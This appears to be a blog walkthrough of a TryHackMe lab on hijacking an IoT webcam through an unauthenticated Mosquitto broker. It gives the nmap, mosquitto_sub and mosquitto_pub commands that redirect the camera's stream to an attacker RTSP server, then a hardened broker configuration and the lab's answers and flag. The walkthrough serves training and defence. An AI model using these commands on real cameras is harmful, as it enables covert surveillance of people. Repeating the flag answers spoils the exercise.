[Day 21] MQTT

December 21, 2022

Today is a great day for hacking as I am learning about IoT hacking! More specifically, today's IoT hacking is focused on webcam hacking, which is something I have been interested in for the past couple of weeks.

First, I launch the target machine and run an nmap scan against common webcam port 1883, which happens to have mosquitto version 1.6.9 running as a service. According to THM, I need to gain more device information by enumerating an ID. If I use nmap -p 1883 -sV -sC <IP> or mosquitto_sub -h <IP> -t device/init, then I can find the ID 77OVW9OKDCY0DQRD6F49.

After some code analysis of the firmware from yesterday's topic, I create a JSON message that can be received by the webcam. I then launch a Docker image that can watch the webcam with sudo docker run --rm -it --network=host aler9/rtsp-simple-server.

Once the docker-machine started running, I sent this message to the IoT device so I could view the webcam from my computer:

mosquitto_pub -h <target IP> -t device/77OVW9OKDCY0DQRD6F49/cmd -m """{"cmd":"10","url":"rtsp://<attacker IP>:8554/abc123"}"""

Finally, I ran vlc to view the webcam stream with vlc rtsp://127.0.0.1:8554/abc123 and got the final flag!
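
The steps above work because the broker lets a client with no credentials subscribe to device/init and publish to device/<ID>/cmd. As an added example (not part of the original post or the room's material), this Mosquitto configuration shows the weak setting beside a corrected one. The file paths, the camera-controller account and the use of the device ID as each camera's username are assumptions.

```conf
# --- /etc/mosquitto/mosquitto.conf (path is an assumption) ---
# Weak: any client may connect without credentials, so anyone who can
# reach port 1883 can read device/init and write to device/<ID>/cmd.
#   listener 1883
#   allow_anonymous true
#
# Hardened: every client must authenticate, and topic access is
# decided by the ACL file below.
listener 1883
allow_anonymous false
password_file /etc/mosquitto/passwd
acl_file /etc/mosquitto/acl

# --- /etc/mosquitto/acl (path is an assumption) ---
# Hypothetical controller account: the only identity allowed to send
# commands to cameras and to read their announcements.
user camera-controller
topic write device/+/cmd
topic read device/init

# Assumption: each camera logs in with its device ID as its username,
# so %u expands to that ID and a camera can read only its own cmd topic.
pattern read device/%u/cmd
# Cameras may announce themselves, but have no read access to device/init.
pattern write device/init
```

Accounts for the password file are created with mosquitto_passwd. With this in place, the unauthenticated mosquitto_sub and mosquitto_pub calls shown in this walkthrough are refused at connect time.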

Flags

What port is Mosquitto running on?

1883

Is the device/init topic enumerated by Nmap during a script scan of all ports? (y/n)

y

What Mosquitto version is the device using?

1.6.9

What flag is obtained from viewing the RTSP stream?

THM{UR_CAMERA_IS_MINE}
